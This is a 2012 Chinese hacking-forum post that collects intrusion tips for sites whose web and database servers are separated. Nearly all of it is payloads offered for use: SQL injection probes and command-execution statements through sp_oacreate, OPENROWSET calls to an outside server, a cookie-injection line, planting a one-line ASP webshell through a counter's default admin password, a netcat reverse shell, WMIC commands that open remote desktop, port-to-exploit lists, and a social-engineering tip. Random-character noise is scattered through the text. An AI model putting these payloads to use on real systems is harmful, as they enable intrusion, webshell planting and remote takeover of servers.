找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3190|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
' M: m8 i- F- a4 M! V
3 x. [/ O4 }0 G, k- z7 y* m6 [  R
2 G) O1 a- f' CSA点数据库分离搞法+语句:
2 k7 F% J; m' U) c+ E# T8 G1 C# ^. _* z
9 `" j0 O. q$ Y7 i+ [: G注射点不显错,执行下面三条语句页面都返回正常。7 `8 v/ z3 F; o' ?. V
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')/ q! w% p5 ?( {/ O! ]
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
& j) Z6 X1 k' J/ B& J  Y# ^  \and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
0 k. h- Y- E2 e可以列目录,判断系统为2000,web与数据库分离
' D2 i3 _8 h' f2 s遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
+ l# h0 _. _3 V. h4 }在注射点上执行" L6 M$ r1 f9 W; S9 B! y3 a4 G& R+ k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
2 o1 S  a; P+ N- O1 m3 ]9 E页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
9 x3 p1 i0 [4 N# r+ u7 c还有我用NC监听得其他端口都没有得到IP。9 ?0 D( M, k/ C
; }& R* G) L- a% H" i# I/ _
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
" D# n7 S# T' D3 J# ?6 I7 ^* H'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--& C+ K5 c! T4 w# Y; I; B# ?$ Z+ V

" Z8 P" Z( N5 m3 ?;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--7 [5 m2 q+ W( u4 z7 ]4 N
$ b9 b. H' [& L1 i/ G: \* ^
现在就猜想是不是数据库是内网而且不能连外网。( t7 I  v: g( x$ A5 K6 _  `

6 L' m# j$ v) v! t$ q
8 K6 D; d2 U. |' l1 X/ Waccess导出txt文本代码! J* F6 a) s- \9 V: ~/ Q' \8 z
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
2 W7 _5 f0 K) D0 a: M; O4 S+ D4 ?+ C/ [. J

9 C9 U, E, |- P! M& e9 q/ _8 v
% u( m: S. Q3 {! F. H% o) o! q- o# S自动跳转到指定网站代码头/ @& ~$ E+ O+ l3 h: |4 q& y4 u
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>: _$ |" c5 d# j* P2 O7 w
3 B) Q8 W* z3 F' F( p% v/ N8 M: u# r
. t7 A7 d( _2 m" ^
入侵java or jsp站点时默认配置文件路径:) d) ~7 b4 X, x# H& s
\web-inf\web.xml
: E$ `( T. z0 e1 ^$ a6 Btomcat下的配置文件位置:8 }! {" u; C4 h/ u, E5 g
\conf\server.xml            (前面加上tomcat路径)
/ _+ o4 K+ I1 x1 u2 {, n7 _9 \1 l, F\Tomcat 5.0\webapps\root\web-inf\struts-config.xml( c7 X: K& }0 o+ o- r) b

/ N4 g& j' ?( i1 R1 @  G; Q8 A7 r5 T: L; R  G( a/ @
5 s3 N+ M7 P4 U+ h: \5 B
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
# X4 `3 k3 {2 n- D-1%236 n3 d7 B& {' S" f' }' l5 X1 x; y
>
: i  O+ [7 {6 {. l2 D  b+ b  w<
. a9 A: C) Z- [1 U% ^( H0 w1'+or+'1'='1
" p7 c3 V3 \- Sid=8%bf
& [$ n9 B, A* P. D" w, F5 h/ T# L  L8 Y. w* I: }& m+ \7 y" m
全新注入点检测试法:: W$ ^7 e3 p" i* i
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
! V1 j" a% U& o1 W* [$ M; U/ n" J/ Z2 F- ?1 ]6 v$ k
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
# y- L+ w7 ~9 K6 N  `# i3 ]( m* m; {/ O8 P& y
搜索型注入判断方法:% G  w9 g. |0 P$ c* O: N
北京%' and '1'='1' and '%'='
3 z. Q! `/ w2 {6 a7 H% B, L北京%' and '1'='2' and '%'='
: w6 `! y0 s5 y3 \
  F0 w, G" j' b9 c9 M( o1 l/ s. v) @' n1 J
COOKIES注入:
- o: S) d* E7 Z  w2 Z
8 j: w/ U2 v+ }javascript:alert(document.cookie="id="+escape("51 and 1=1"));3 b1 ~0 |6 o( j: e! V# q* r: q

1 w3 X0 D5 S2 `7 ^2000专业版查看本地登录用户命令:
/ Y9 e+ p  P  u. J5 Xnet config workstation
+ C% m# M7 `$ v* y
: B4 Q; Q& @- `9 S- M4 _" \9 F
( u) ^, R2 W% _5 Y, }6 M# B2003下查看ipsec配置和默认防火墙配置命令:
% _! [, K6 ~3 @! _netsh firewall show config5 s5 v2 O: x) |  C
netsh ipsec static show all/ g9 K1 a9 q/ m0 r! L) O

0 O9 i- h$ f- R/ c% d# K不指派指定策略命令:; I9 ~4 h8 G' {0 z3 W7 _4 g
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
2 Q  q- p. J* t3 ~" M" Z# r- vnetsh ipsec static show policy all  显示策略名" ?* v* Y3 w- ?6 I
. Z3 s! {+ W1 o/ B* J9 u
0 V: ^$ t3 D) W' f. ~& Q
猜管理员后台小技巧:0 e+ D2 F& n2 j
admin/left.asp
, E( {; n4 l9 P" x* Padmin/main.asp0 k6 t' I5 \0 X  b) a* f8 _
admin/top.asp& s$ p6 _! G9 P5 B  M' a
admin/admin.asp * b0 V" z3 W' q
会现出菜单导航,然后迅雷下载全部链接" P! [  B# p, G7 y4 Q( L

: H. n2 E' ~/ j) q2 c1 m" H- Q, X! T* x
社会工程学:
, f, C3 g. b" y用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人* u+ J  Z# C$ a& d" v% o6 u% i
然后去骗客服2 N. E, F, y/ g9 P0 g+ Q; d

- Y( |! B( a( q# U1 f5 z$ N. i: L0 a5 k4 H& N: D9 K4 i4 {
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: + C, W  X) k3 [5 y* i$ c
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
* M2 C; L' P* k% @: B8 P  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。+ `$ p7 @" n( a' [. l# U1 {% B8 j

2 b7 T, f0 @' N
$ f( K$ ?% Y6 c1 g( y1 E2 C; Y( O8 @6 |) G# O/ h
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查); G# }. @% A$ y
( h. ?9 s6 B; u6 l* z) L
, M/ I# h; T" U# y: C8 \
" z* \+ \% x( I6 k% ?0 ~1 h$ h4 }
CMD加密注册表位置2 g" @6 q1 r9 ]# y! y  H
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
+ d. F0 w; K0 tAutoRun
4 ~- u5 ]0 D* e  J9 |% v" _! Y: I- F1 C  ^, b
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
) S$ Q% J7 M/ `7 |, X# OAutoRun) W7 [5 ]/ ?# h6 i, X

. h$ \( N4 K& n- ~# Z5 C. O7 p, S1 I* d- p4 D1 v* ?8 |) E$ B
在找注入时搜索Hidden,把他改成test- ?' D* s  O9 P# r/ \' I: ^
: f9 X3 x) z1 X( Q( M

) E* ~3 a8 I4 o: v) }# s: |- m
% u" E  N4 U% y$ Ymstsc /v:IP /console . ~4 Z# y$ A: T/ Z& B

* o4 [7 o* I/ s$ W/ K
7 ^# N4 l( R" I) F一句话开3389:; Y6 s- K$ v$ _6 T" E2 n: j1 Z

& @  G- @# L+ ?+ {' t最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  ! P5 |* O! q1 D( Z
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
& d0 o* {  l. V6 U# A! W0 y$ c* W5 \
3 A: W0 s7 V9 W' f5 j7 t3 Q- t
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
7 T0 Z9 `6 `, W( p- h1 m# jInsert into admin(user,pwd) values('test','test')" D" e5 R" h' E9 |1 q1 M: c& D

- k# d9 ~* f. e( ~+ Q/ E4 j( U
% v9 C$ @1 k4 ]NC反弹+ P4 E( U4 n5 ?9 b1 Q; A
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
1 |% L8 ^2 h5 R( B, j1 \8 r1 g然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
2 c( K- Y5 x8 d% p' E( C6 ]- y) v: }8 e9 z- k8 L2 [5 S

/ u* N# C4 v2 t在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
: T4 @& o% i$ s
5 C/ z8 i' w/ v3 j7 y9 M8 ]有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
/ v" m4 c  h8 L# k' V  j, B2 u例如:  x+ P5 X; _8 f* l# v: M: P
subst k: d:\www\ 用d盘www目录替代k盘
6 T' F$ `- [5 P* X# G8 Z: N0 u- Qsubst k: /d  解除K盘代替
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表